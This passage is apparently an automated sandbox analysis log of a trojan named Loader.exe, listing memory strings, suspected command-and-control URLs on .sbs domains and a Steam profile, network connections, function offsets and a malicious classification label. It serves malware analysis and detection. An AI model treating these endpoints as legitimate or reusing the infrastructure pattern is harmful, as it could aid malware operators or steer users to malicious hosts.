Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/
Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/1w#U
Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/api
Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/api%U
Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/apibs-
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/
Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/api
Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/api4
Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/
Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/1w#U
Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/api
Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/api%U
Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/api(
Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/v
Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs:443/apii
Source: Loader.exe, 00000003.00000002.2304373806.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: Loader.exe, 00000003.00000002.2304373806.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Loader.exe, 00000003.00000002.2304373806.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://widdensmoywi.sbs/api
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	HTTPS traffic detected: 104.21.8.37:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49761 version: TLS 1.2

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00436F40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_00436F40

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00436F40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_00436F40

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001EE020	0_2_001EE020
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001FA1A0	0_2_001FA1A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C6220	0_2_001C6220
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00202360	0_2_00202360
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001DA496	0_2_001DA496
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001D8496	0_2_001D8496
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C84A0	0_2_001C84A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_0019C62E	0_2_0019C62E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001DE6E0	0_2_001DE6E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00202770	0_2_00202770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001F0892	0_2_001F0892
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001D4882	0_2_001D4882
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00204890	0_2_00204890
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001F4990	0_2_001F4990
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001ECA95	0_2_001ECA95
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00204B30	0_2_00204B30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001E0B00	0_2_001E0B00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C8B60	0_2_001C8B60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001F4C00	0_2_001F4C00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00202C60	0_2_00202C60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001CCC40	0_2_001CCC40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C4DD0	0_2_001C4DD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00204E00	0_2_00204E00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C2E50	0_2_001C2E50
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00196E6F	0_2_00196E6F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001D6F0F	0_2_001D6F0F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001BEF00	0_2_001BEF00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001EEFD9	0_2_001EEFD9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001CCFC0	0_2_001CCFC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001D2FC0	0_2_001D2FC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C8FF0	0_2_001C8FF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001FEFE0	0_2_001FEFE0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001CF000	0_2_001CF000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001A9074	0_2_001A9074
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_002050F0	0_2_002050F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001CF1A3	0_2_001CF1A3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001F31D0	0_2_001F31D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001BF1F3	0_2_001BF1F3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001E31E2	0_2_001E31E2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001EB227	0_2_001EB227
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001BF24E	0_2_001BF24E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001D3397	0_2_001D3397
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001CB3D0	0_2_001CB3D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001E1410	0_2_001E1410
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001E9400	0_2_001E9400
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001F3400	0_2_001F3400
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001BF437	0_2_001BF437
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001BF4B1	0_2_001BF4B1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001E54B0	0_2_001E54B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001BF502	0_2_001BF502
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001EF5CE	0_2_001EF5CE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C1670	0_2_001C1670
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001AD7A5	0_2_001AD7A5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C57D0	0_2_001C57D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001CB7C0	0_2_001CB7C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001ED800	0_2_001ED800
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001F9870	0_2_001F9870
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C78F6	0_2_001C78F6
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001D99AE	0_2_001D99AE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001DFA3E	0_2_001DFA3E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001F9AD0	0_2_001F9AD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_0019FB00	0_2_0019FB00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C9B00	0_2_001C9B00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001E1B30	0_2_001E1B30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00203B77	0_2_00203B77
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001CFB6A	0_2_001CFB6A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001D9C73	0_2_001D9C73
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00191CD2	0_2_00191CD2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00201E21	0_2_00201E21
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001ABE21	0_2_001ABE21
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00191F1A	0_2_00191F1A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001A3F53	0_2_001A3F53
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001C7FE0	0_2_001C7FE0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_001A9074	2_2_001A9074
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_0019FB00	2_2_0019FB00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_00191CD2	2_2_00191CD2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_0019C62E	2_2_0019C62E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_001ABE21	2_2_001ABE21
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_00196E6F	2_2_00196E6F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_00191F1A	2_2_00191F1A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_001A3F53	2_2_001A3F53
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_001AD7A5	2_2_001AD7A5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004112A3	3_2_004112A3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00443D4F	3_2_00443D4F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00401000	3_2_00401000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041900F	3_2_0041900F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040F0C0	3_2_0040F0C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004150C0	3_2_004150C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040A0E0	3_2_0040A0E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004410E0	3_2_004410E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040B0F0	3_2_0040B0F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004320A3	3_2_004320A3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00411100	3_2_00411100
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00430120	3_2_00430120
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004471F0	3_2_004471F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00420233	3_2_00420233
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004352D0	3_2_004352D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004252E2	3_2_004252E2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042C2EE	3_2_0042C2EE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004012F3	3_2_004012F3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043C2A0	3_2_0043C2A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004452A0	3_2_004452A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004122B0	3_2_004122B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040134E	3_2_0040134E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00429370	3_2_00429370
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00408320	3_2_00408320
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042D327	3_2_0042D327
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004453F0	3_2_004453F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00444460	3_2_00444460
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040D4D0	3_2_0040D4D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415497	3_2_00415497
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042B500	3_2_0042B500
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00429500	3_2_00429500
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00435500	3_2_00435500
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00423510	3_2_00423510
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042D530	3_2_0042D530
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041A596	3_2_0041A596
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041C596	3_2_0041C596
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040A5A0	3_2_0040A5A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004275B0	3_2_004275B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004455B0	3_2_004455B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00401602	3_2_00401602
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004316CE	3_2_004316CE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00403770	3_2_00403770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00428770	3_2_00428770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00445700	3_2_00445700
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042E7C2	3_2_0042E7C2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004207E0	3_2_004207E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004457F0	3_2_004457F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00444870	3_2_00444870
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040F819	3_2_0040F819
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040D8C0	3_2_0040D8C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004078D0	3_2_004078D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042C8DA	3_2_0042C8DA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043B970	3_2_0043B970
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042F900	3_2_0042F900
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042C931	3_2_0042C931
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00416982	3_2_00416982
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00432992	3_2_00432992
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00446990	3_2_00446990
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00421A60	3_2_00421A60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041FAC9	3_2_0041FAC9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042BAF1	3_2_0042BAF1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00436A90	3_2_00436A90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041BAAE	3_2_0041BAAE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00445B20	3_2_00445B20
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043BBD0	3_2_0043BBD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00411C5B	3_2_00411C5B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040AC60	3_2_0040AC60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00427C6E	3_2_00427C6E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040BC00	3_2_0040BC00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00422C00	3_2_00422C00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043CC17	3_2_0043CC17
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00423C30	3_2_00423C30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00446C30	3_2_00446C30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040ED40	3_2_0040ED40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00444D60	3_2_00444D60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00408D70	3_2_00408D70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041BD73	3_2_0041BD73
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042AD00	3_2_0042AD00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00436D00	3_2_00436D00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00404E60	3_2_00404E60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041EE2E	3_2_0041EE2E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00406ED0	3_2_00406ED0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00446F00	3_2_00446F00

Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 0019B301 appears 32 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 001A35FA appears 34 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 001CA620 appears 99 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 0019D545 appears 42 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 0040C720 appears 70 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 001CBE70 appears 198 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 0040DF70 appears 198 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00197760 appears 104 times

Source: C:\Users\user\Desktop\Loader.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 284

Source: Loader.exe

Static PE information: invalid certificate

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Loader.exe

Static PE information: Section: .data ZLIB complexity 0.9913109893578643

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/13@11/9

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_0043C754 CoCreateInstance,CoCreateInstance,

3_2_0043C754

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7096
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5200

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\1d8f5f5e-7da6-4e0d-9db7-4cbc689c2b24

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Command line argument: MZx	0_2_00192198
